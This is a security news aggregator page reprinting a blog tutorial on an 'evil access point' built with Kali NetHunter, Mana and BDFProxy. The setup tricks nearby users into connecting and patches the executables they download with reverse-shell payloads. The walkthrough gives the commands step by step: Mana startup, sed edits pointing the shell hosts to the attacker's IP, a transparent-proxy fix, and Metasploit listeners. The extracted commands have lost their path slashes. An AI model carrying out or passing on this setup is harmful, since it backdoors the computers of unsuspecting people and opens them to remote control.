|
|
|
Evil Access Point with Auto-Backdooring FTW |
Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Présentation : Evil Access Point with Auto-Backdooring FTW This post is about setting up an evil access point that will automatically backdoor executables that connected users download. Pretty neat, right This tutorial is inspired by muts' NetHunter video of BDFProxy on NetHunter. I am using Kali NetHunter 2.0 running from a Nexus 9. I am using a TP-LINK TLWN722N the 150Mbps version as my secondary network interface. I recently purchased a Nexus 9 tablet and decided to load it up with Kali NetHunter. NetHunter is a release of Kali made specifically for hackers on-the-go. It s packed with lots of cool stuff like one-click scripts, HID Keyboard attack capabilities plus a bunch of the tools that Kali desktop comes with. Tools A few tools I will be using Mana Rouge Access Point toolkit. It implements a more advanced version of the Karma attack. The most notable improvement is Mana responds to other AP broadcasts instead of device probes like Karma, but still with the end goal of tricking victims into connecting to the AP you own. Plus, it includes lots of other neat evil AP tricks that are baked right in. For more info on Mana I d recommend watching the Defcon 22 talk where the tool was release here. BackdoorFactory BDFProxy Automatically patches binaries with malicious payloads on the fly via MITM. False Start Since I want to also provide victims with Internet access so I can backdoor their downloads I will need another Wi-Fi interface on my Nexus 9. I ended up going with the TP-LINK TLWN722N because of its low power usage and its compatibility with Kali supports packet injection . I launched the Kali NetHunter menu and saw a promising looking menu item Evil Access Point with Auto-Backdooring FTW Kali NetHunter comes with Mana already installed and ready to go, or so I thought. Chances are I was doing something wrong, but I was not able to get the built-in one click launcher working out of the box. It even contained a screen for bdfproxy.cfg When I started it there was even the option to start with bdf Evil Access Point with Auto-Backdooring FTW But no dice. Even after correcting my upstream device from eth0 to wlan1 and double checking the dhcpd settings in the config file I couldn t get the thing to run. I couldn't seem to find the output of either Mana or BDFProxy in the logs either. Setting Up So, off to the terminal Home sweet home. I went into the Mana folder and skulked around a little bit cd usr share mana-toolkit run-mana ls lah Evil Access Point with Auto-Backdooring FTW Aha The start-nat-simple-bdf-lollipop.sh looks promising. Let s have a look Evil Access Point with Auto-Backdooring FTW Everything looks pretty straightforward actually, which was pleasantly surprising. I never know what to expect with new tools. We assign some variables for devices, enable forwarding, start an access point and DHCP, monkey with the iptables and off we go. The only thing that stumped me at first was the Add fking rule to table 1006 . There are some config files mentioned in there. Let s make sure they are set up properly. First stop is etc mana-toolkit hostapd-karma.confg Evil Access Point with Auto-Backdooring FTW Next let s look at etc mana-toolkit dhcpd.conf Evil Access Point with Auto-Backdooring FTW Looks like we re using Google for DNS and putting our clients on the 10.0.0.0 24 range. Cool beans. Let s also take a look at the BDFProxy config file at etc bdfproxy bdfproxy.cfg config file below truncated to the important parts Evil Access Point with Auto-Backdooring FTW Looks like there is something slightly off here. The IPs configured for our reverse shells 192.168.1.168 and 192.168.1.16 need to point back to us. According to our dhcpd.conf settings we're going to use the current settings aren't correct. We will be the router IP named in dhcpd.conf, so we need to change bdfproxy.cfg accordingly by setting all the HOSTs to point to us at 10.0.0.1. Quick replace with sed sed i 's 192.168.1.168 10.0.0.1 g' bdfproxy.cfg sed I 's 192.168.1.16 10.0.0.1 g' bdfproxy.cfg The diffs Evil Access Point with Auto-Backdooring FTW Starting up the Machine Ok, so it s time to start Mana up cd usr share mana-toolkit run-mana . start-nat-simple-bdf-lollipop.sh In a new terminal we start BDFProxy up cd etc bdfproxy . bdfproxy Now that BDFProxy is up it has created a Metasploit resource file. It wasn t entirely obvious at first where this file lived it is not in etc bdfproxy . It turns out the file is here usr share bdfproxy bdfproxy_msf_resource.rc That resource file will help handle reverse shells. Time to open another terminal, navigate there and start up Metasploit cd usr share bdfproxy service postresql start cat bdf_msf_resource.rc sanity check of conents, make sure IP update took msfconsole r bdfproxy_msf_resource.rc After Metasploit is fired up we can see the resource file has loaded Evil Access Point with Auto-Backdooring FTW Sweetness. Here is where I got stuck for a little bit. It appeared everything is set up and working properly. Mana was creating APs and I could connect and get back out to the internet. Iptables set up by Mana are correctly forwarding my traffic from port 80 to 8080 where BDFProxy is waiting. The problem is BDFProxy is failing to transparently proxy connections mitmproxy underneath is actually failing . I got this error on all HTTP connections from my laptop test machine connected to the evil AP HttpError 'Invalid HTTP request form expected absolute, got relative ', It turns out I missed changing one of the default bdfproxy.cfg settings. The line transparentProxy None Needs to be changed to transparentProxy transparent After that BDFProxy was able to successfully backdoor executables. I connected to the AP with my laptop and download a file over http. I downloaded Audacity, and also tested with downloading Putty and PSFTP. Once BDFProxy gets its hooks in the backdoor is dropped in place Evil Access Point with Auto-Backdooring FTW Here is the part that blew me away executables within zips are backdoored, all done on the fly. How cool is that For executable formats it not only works for Windows exe PEs, but it does Linux ELF and Mach-O that means you OSX . Very cool stuff.
Les derniers articles du site "Rob Fuller's broadcasted articles on Inoreader" :
- RDP Replay Code Release
- An Introduction to Debugging the Windows Kernel with WinDbg
- A write up of my recent experiences of getting clients involved during testing.
- Active Directory Recon Without Admin Rights
- New tool that shows the history of connections to wireless networks on your computer
- Android privilege escalation to mediaserver from zero permissions CVE-2014-7920 CVE-2014-7921
- Bypassing Windows ASLR in Microsoft Office using ActiveX controls
- Evil Access Point with Auto-Backdooring FTW
- Using ngrok to proxy internal servers in restrictive environments
- Using the SSH u0093Konami Code u0094 SSH Control Sequences
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.190.17.190 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.190.17.190 to any 80"
- Nous contacter par mail
| Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
| Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
| Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|
